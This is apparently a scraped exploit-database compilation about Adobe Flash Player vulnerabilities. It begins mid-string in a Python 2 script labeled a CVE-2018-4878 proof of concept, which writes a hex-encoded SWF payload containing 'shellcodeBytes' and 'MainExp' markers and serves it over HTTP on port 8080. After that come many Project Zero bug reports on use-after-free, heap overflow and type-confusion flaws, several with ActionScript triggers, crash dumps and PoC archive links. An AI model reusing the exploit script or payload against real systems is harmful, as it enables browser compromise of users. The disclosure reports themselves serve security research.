x65\x01\x6C\x03\x91\x74\x65\x01\x2B\x6D\x03\xF0\x6B\x65\x01\x65\x01\x6C\x05\x24\x04\xA0\x74\x6D\x05\xF0\x4C\x65\x01\x6C\x03\x25\x80\x02\x0C\x04\x00\x00\x10\x06\xFF\xFF\x65\x01\x6C\x07\x48\xF0\x6F\x10\x17\x00\x00\xD0\x30\xD1\x30\x5A\x00\x2A\xD6\x2A\x30\x2B\x6D\x01\xF0\x71\x5D\x3C\x2C\x6C\x4A\x3C\x01\x03\x24\x00\x48\x01\x46\x84\x06\x8A\x06\x3C\x3D\x08\x0D\x00\x01\x01\x00\x0E\x00\x02\x01\x00\x0F\x00\x03\x01\x00\x10\x00\x04\x01\x00\x11\x00\x05\x01\x00\x12\x00\x06\x01\x00\x13\x00\x07\x01\x00\x14\x00\x08\x15\x00\x03\x0D\x0D\x04\x05\x86\x03\xD0\x30\x24\x00\x74\x63\x04\x5D\x4D\x46\x4D\x00\x29\x5D\x4C\x5D\x4D\x66\x4D\x46\x4C\x01\x74\x63\x05\xF0\x7C\x5D\x4E\x5D\x4E\x5D\x4E\x62\x05\x24\x08\xA0\x46\x4E\x01\x24\x14\xA0\x46\x4E\x01\x24\x04\xA0\x46\x4E\x01\x5D\x51\x66\x51\x96\x96\x12\x08\x00\x00\x25\xBC\x01\x82\x10\x04\x00\x00\x25\xB0\x01\x82\xA0\x74\x63\x06\xF0\x7D\x5D\x4E\x62\x06\x46\x4E\x01\x2D\x04\x15\x04\x00\x00\x10\x0A\x00\x00\xF0\x7F\x62\x06\x24\x04\xA0\x74\x63\x06\xF0\x81\x01\x5D\x4E\x62\x06\x46\x4E\x01\x74\x63\x06\xF0\x82\x01\x5D\x4E\x62\x06\x46\x4E\x01\x74\x63\x07\xF0\x83\x01\x5D\x4E\x62\x05\x24\x1C\xA0\x46\x4E\x01\x74\x63\x08\xF0\x84\x01\x5D\x4E\x62\x05\x24\x20\xA0\x46\x4E\x01\x74\x63\x09\xF0\x85\x01\x5D\x47\x66\x47\x5D\x40\x66\x40\x53\x01\x25\x80\x02\x42\x01\x80\x5A\x63\x0A\x10\x24\x00\x00\x09\xF0\x88\x01\x62\x0A\x62\x04\x5D\x4E\x62\x07\x25\x80\x01\xA1\x62\x04\x24\x04\xA2\xA0\x46\x4E\x01\x61\x53\xF0\x89\x01\x62\x04\x91\x74\x63\x04\xF0\x86\x01\x62\x04\x25\x80\x02\x0C\x04\x00\x00\x10\xCC\xFF\xFF\xF0\x8B\x01\x62\x0A\x24\x20\x24\x07\xA0\xD1\x61\x53\xF0\x8C\x01\x5D\x4F\x62\x05\x24\x1C\xA0\xD2\x46\x4F\x02\x29\xF0\x8D\x01\x5D\x4F\x62\x05\x24\x20\xA0\xD3\x46\x4F\x02\x29\xF0\x8E\x01\x5D\x4F\x62\x06\x5D\x49\x62\x0A\x46\x49\x01\x25\x80\x01\xA0\x46\x4F\x02\x29\xF0\x8F\x01\x5D\x3E\x24\x41\x4A\x3E\x01\x80\x3E\x63\x0B\xF0\x90\x01\x5D\x4D\x66\x4D\x66\x1F\x20\x62\x0B\x46\x20\x02\x82\x63\x0C\xF0\x91\x01\x5D\x4F\x62\x06\x62\x07\x46\x4F\x02\x29\xF0\x92\x01\x5D\x4F\x62\x05\x24\x1C\xA0\x62\x08\x46\x4F\x02\x29\xF0\x93\x01\x5D\x4F\x62\x05\x24\x20\xA0\x62\x09\x46\x4F\x02\x29\xF0\x94\x01\x47\x00\x00\x04\x0C\x03\x05\x0A\x92\x03\xD0\x30\x57\x2A\xD5\x30\x65\x01\x24\x00\x6D\x02\xF0\x98\x01\x65\x01\x20\x80\x3E\x6D\x01\xF0\x99\x01\x65\x01\x20\x80\x65\x6D\x03\xF0\x9F\x01\x65\x01\x5D\x3F\x66\x3F\x82\x6D\x08\xF0\xA0\x01\x65\x01\x20\x85\x6D\x09\xF0\xA4\x01\xF0\xA4\x01\x65\x01\x56\x00\x80\x3E\x6D\x01\xF0\xA5\x01\x5D\x42\x66\x42\x66\x43\x24\x00\x61\x44\xF0\xA6\x01\x65\x01\x24\x00\x73\x6D\x02\x10\x24\x00\x00\x09\xF0\xA7\x01\x65\x01\x6C\x01\x5D\x42\x66\x42\x66\x43\x46\x45\x00\x46\x25\x01\x29\xF0\xA6\x01\x65\x01\x65\x01\x6C\x02\x24\x04\xA0\x73\x6D\x02\x65\x01\x6C\x02\x5D\x42\x66\x42\x66\x43\x66\x46\x15\xCC\xFF\xFF\xF0\xA8\x01\x65\x01\x5D\x47\x66\x47\x5D\x40\x66\x40\x53\x01\x64\x65\x01\x6C\x01\x41\x01\x80\x66\x6D\x03\xF0\xAA\x01\x65\x01\x5D\x49\x65\x01\x6C\x03\x46\x49\x01\x74\x6D\x04\xF0\xAC\x01\x65\x01\x5D\x64\x46\x64\x00\x74\x6D\x05\xF0\xAD\x01\x65\x01\x6C\x05\x24\x00\x13\x04\x00\x00\x10\x0B\x00\x00\xF0\xAF\x01\x5D\x3C\x2C\x6C\x4A\x3C\x01\x03\x5D\x4B\x65\x01\x6C\x05\x65\x01\x6C\x04\x65\x01\x6C\x03\x66\x46\x24\x04\xA2\x46\x4B\x03\x29\x65\x01\x5D\x4C\x5D\x4D\x66\x4D\x46\x4C\x01\x74\x6D\x06\xF0\xB4\x01\x65\x01\x5D\x4E\x5D\x4E\x65\x01\x6C\x06\x24\x1C\xA0\x46\x4E\x01\x24\x08\xA0\x46\x4E\x01\x24\x04\xA0\x74\x6D\x06\xF0\xB5\x01\x65\x01\x5D\x4E\x65\x01\x6C\x06\x46\x4E\x01\x74\x6D\x07\xF0\xB6\x01\x5D\x4F\x65\x01\x6C\x06\x65\x01\x6C\x04\x46\x4F\x02\x29\xF0\xB8\x01\x65\x01\x5D\x4D\x66\x4D\x20\x5D\x5F\x66\x5F\x46\x1F\x02\x82\x6D\x08\xF0\xBA\x01\x5D\x4F\x65\x01\x6C\x06\x65\x01\x6C\x07\x46\x4F\x02\x29\x47\x10\x18\x00\x00\xD0\x30\xD1\x30\x5A\x00\x2A\xD6\x2A\x30\x2B\x6D\x01\xF0\xBF\x01\x5D\x3C\x2C\x6C\x4A\x3C\x01\x03\xF0\xC2\x01\x47\x01\x35\xF2\x02\xF6\x02\x3C\x3D\x09\x29\x00\x01\x1E\x00\x2A\x00\x02\x15\x00\x2B\x00\x03\x1A\x00\x2C\x00\x04\x01\x00\x2D\x00\x05\x01\x00\x2E\x00\x06\x01\x00\x2F\x00\x07\x01\x00\x30\x00\x08\x00\x00\x31\x00\x09\x32\x00\x05\x08\x01\x05\x06\x0E\xF1\x05\xF0\x0C\xD0\x30\xF0\x0E\xD0\x49\x00\xF0\x0F\x47\x00\x00\x06\x09\x01\x01\x04\x3D\xD0\x30\x10\x05\x00\x00\x41\x05\x03\x58\x04\xF1\x05\xF0\x07\x5D\x36\x5D\x37\x66\x37\x10\x04\x00\x00\x16\x1F\x00\x00\x30\x5D\x35\x66\x35\x30\x5D\x35\x66\x35\x58\x00\x1D\x26\x11\x06\x00\x00\x47\x70\x45\x0A\x10\xD5\x1D\x68\x34\xF1\x05\xF0\x05\x47\x00\x00\x1C\x13\x02\x00\x02\x00\x73\x68\x65\x6C\x6C\x63\x6F\x64\x42\x79\x74\x65\x73\x00\x00\x00\x4D\x61\x69\x6E\x45\x78\x70\x00\x40\x00\x00\x00"
print "[+] CVE-2018-4878 poc "
print "[x] files created"
swf = "%s.swf" % flash_name
html = """
<!DOCTYPE html>
<html>
""" + "<embed src=\"" + swf + "\"></embed>" + """
</html>
"""
f = open("%s" % swf, "wb")
f.write(data)
f.close()
f = open("index.html", "wb")
f.write(html)
f.close()
HandlerClass = SimpleHTTPRequestHandler
ServerClass = BaseHTTPServer.HTTPServer
Protocol = "HTTP/1.0"
port = 8080
server_address = ('0.0.0.0', port)
HandlerClass.protocol_version = Protocol
httpd = ServerClass(server_address, HandlerClass)
sa = httpd.socket.getsockname()
print "Server ready", sa[0], "port", sa[1], "..."
httpd.serve_forever()
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=719
There is a use-after-free that appears to be related to rendering the display based on multiple scripts. A PoC is attached, tested on Windows only. Note the PoC is somewhat unreliable on some browsers, sometimes it needs to render a minute or two in the foreground before crashing. This is related to unreliability in the freed object being reallocated as a value that causes the crash, not unreliability in the underlying bug (it crashes immediately in a debug build of Flash). With enough effort, an attacker could likely trigger the issue immediately.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39778.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=628
There is a use-after-free that appears to be related to rendering the display based on multiple scripts. A PoC is attached, tested on Windows only. Note the PoC is somewhat unreliable on some browsers, sometimes it needs to render a minute or two in the foreground before crashing. This is related to unreliability in the freed object being reallocated as a value that causes the crash, not unreliability in the underlying bug (it crashes immediately in a debug build of Flash). With enough effort, an attacker could likely trigger the issue immediately.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39220.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=398&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
The attached sample, signal_sigsegv_7ffff603deef_1525_268381c02bc3b05c84578ebaeafc02f0.swf, typically crashes in this way on my Linux x64 build (Flash v17.0.0.188):
=> 0x00007f693155bf58: mov (%rdi),%rbx
rdi 0x23c 572
At first glance this might appear to be a NULL dereference but sometimes it crashes trying to access 0xc8 and different builds have shown crashes at much wilder addresses, so there is probably a use-after-free or other non-deterministic condition going on. For example, our fuzzing cluster saw a crash at 0x400000001.
The base sample from which the fuzz case is derived is also attached.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37868.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=720
There is a heap overflow in the Zlib codecs used when playing flv files in flash. Sample flv files are attached. Load http://127.0.0.1/LoadMP42.swf?file=smalloverflow.flv to reproduce.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39609.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1008
The attached FLV file causes a heap overflow in YUVPlane decoding.
To reproduce, put LoadMP4.swf and yuvplane.flv on a server, and visit 127.0.0.1/LoadMP4.swf?file=yvplane.flv.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41423.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=416&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
This issue is a variant of issue 192 , which the fix did not address.
If XMLSocket connect is called on an object that already has a destroy function set, such as a BitmapData object, the method will set the user data of that object, but not clear the destroy function. This leads to type confusion when the user data is freed during garbage collection.
A PoC is as follows:
class subsocket extends flash.display.BitmapData{
public function subsocket(){
var n = {valueOf : func};
this.valueOf = func;
var x = new XMLSocket();
x.connect.call(this, "127.0.0.1", this);
}
function func(){
if(this){
}
this.__proto__ = {};
this.__proto__.__constructor__ = flash.display.BitmapData;
super(10, 10, true, 10);
return 80;
}
}
A SWF and fla are attached. Note that this PoC needs to be run on a webserver on localhost (or change the IP in the PoC to the server value), and it only crashes in Chrome on 64-bit Linux.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37876.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=365&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
If a watch is set on the childNodes object of an XML object, and then the XML object is manipulated in a way that causes its child nodes to be enumerated, the watch will trigger. If the function in the watch deletes all the child nodes, the buffer containing the nodes will be deleted, even though the original function will still access it when it unwinds. This can lead to a childnodes array in ActionScript containing pointers that can be specified by an attacker. A minimal POC is as follows:
var doc:XML = new XML();
var rootNode:XMLNode = doc.createElement("rootNode");
var oldest:XMLNode = doc.createElement("oldest");
var middle:XMLNode = doc.createElement("middle");
var youngest:XMLNode = doc.createElement("youngest");
var youngest1:XMLNode = doc.createElement("youngest1");
var youngest2:XMLNode = doc.createElement("youngest2");
var youngest3:XMLNode = doc.createElement("youngest3");
// add the rootNode as the root of the XML document tree
doc.appendChild(rootNode);
// add each of the child nodes as children of rootNode
rootNode.appendChild(oldest);
rootNode.appendChild(middle);
rootNode.appendChild(youngest1);
rootNode.appendChild(youngest2);
rootNode.appendChild(youngest3);
// create an array and use rootNode to populate it
var firstArray:Array = rootNode.childNodes;
trace (firstArray.length);
firstArray[0] = "test";
firstArray.watch("length", f);
rootNode.appendChild(youngest);
function f(a, b){
trace("in f " + a + " " + b + " " + c);
if(b == 1){
firstArray.unwatch("length");
middle.removeNode();
oldest.removeNode();
youngest1.removeNode();
youngest2.removeNode();
youngest3.removeNode();
youngest.removeNode();
}
for(var i = 0; i < 100; i++){
var b = new flash.display.BitmapData(100, 1000, true, 1000);
var c = "aaaaaaaaaaaaa";
}
trace("end length " + rootNode.childNodes.length);
}
A sample fla and swf are also attached.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37859.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=857
The attached fuzz file causes memory corruption when decompressing embedded video content.
Fixed in the September update
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40420.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=629
The attached file causes a use-after-free when calling the stage setter. The PoC works most consistently in Firefox for 64-bit Windows.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39221.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=842
Several methods in flash return instances of the Rectangle class. There is a use-after-free in creating these objects for return. If the this object of the call is a MovieClip, the Rectangle instantiation will run on its thread. If a getter is added to this class's package, it will be invoked when fetching the rectangle constructor, which can free the method's thread, which will cause the Rectangle constructor to run on a thread which has been freed. A minimal PoC is at follows:
var mc = this.createEmptyMovieClip( "mc", 1);
mc.scrollRect = {x : 0, y : 0, height : 10, width : 10}
var r = flash.geom.Rectangle;
var g = flash.geom;
g.addProperty("Rectangle", func, func);
var f = ASnative(900, 405); //scrollRect
mc.f = f;
mc.f();
function func(){
mc.removeMovieClip();
// fix heap
return r;
}
A PoC and swf are attached. The PoC crashes in Chrome on 64-bit Windows.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40309.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1007
The attached swf causes a use-after-free in applying bitmap filters.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41422.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=611
There is a use-after-free in URLStream.readObject. If the object read is a registered class, the constructor will get invoked to create the object. If the constructor calls URLStream.close, the URLStream will get freed, and then the deserialization function will continue to write to it.
A minimal PoC is as follows:
//In main
flash.net.registerClassAlias("bob", myclass);
var u:URLStream = new URLStream();
myclass.u = u;
u.addEventListener(Event.COMPLETE, func);
u.load(new URLRequest("file.txt"));
function func(){
trace(u.readObject());
}
// in myclass
static public var u;
public function myclass()
{
u.close();
}
A sample script and SWF are attached. Note that file.txt needs to be in the same folder as getproperty.swf on a remote server.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39649.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=410&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
The following crash was observed in Flash Player 17.0.0.188 on Windows:
(81c.854): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=37397006 ebx=00000000 ecx=008c0493 edx=09f390d0 esi=08c24d98 edi=09dc2000
eip=07a218cb esp=015eda80 ebp=015edb24 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050216
Flash32_17_0_0_188+0x18cb:
07a218cb ff6004 jmp dword ptr [eax+0x4] ds:0023:3739700a=????????
- The test case reproduces on Windows 7 using IE11. It does not appear to immediately reproduce on Windows+Chrome or Linux+Chrome.
- The crash can also reproduce on one of the two mov instructions prior to the jmp shown here.
- The crash appears to occur due to a use-after-free related to loading a sub-resource from a URL.
- The test case minimizes to an 11-bit difference from the original sample file.
- The following test cases are attached: 2038518113_crash.swf (crashing file), 2038518113_min.swf (minimized file), 2038518113_orig.swf (original non-crashing file).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37875.zip